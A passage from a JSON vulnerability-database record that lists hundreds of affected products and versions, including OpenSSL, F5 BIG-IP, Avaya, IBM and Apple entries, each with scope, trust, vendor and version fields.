"model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.56" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.12" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "fiery print controller", "scope": "eq", "trust": 0.3, "vendor": "efi", "version": "2.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "docucolor dc260", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "docucolor dc242", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "linux enterprise server sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.13" }, { "model": "aura sip enablement services sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura communication manager utility services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.9" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "linux lts lpia", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.1.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura application server sip core pb26", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411" }, { "model": "sterling connect:direct", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.61" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "60" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "linux enterprise sdk sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux enterprise desktop sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "reflection for unix and openvms", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "50" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli network manager fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "jboss enterprise web server for windows", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "hardware management console 7r7.1.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "docucolor dc252", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0.1" }, { "model": "aura application enablement services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "ds8870", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "hardware management console 7r7.2.0 sp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.1" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "message networking", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": 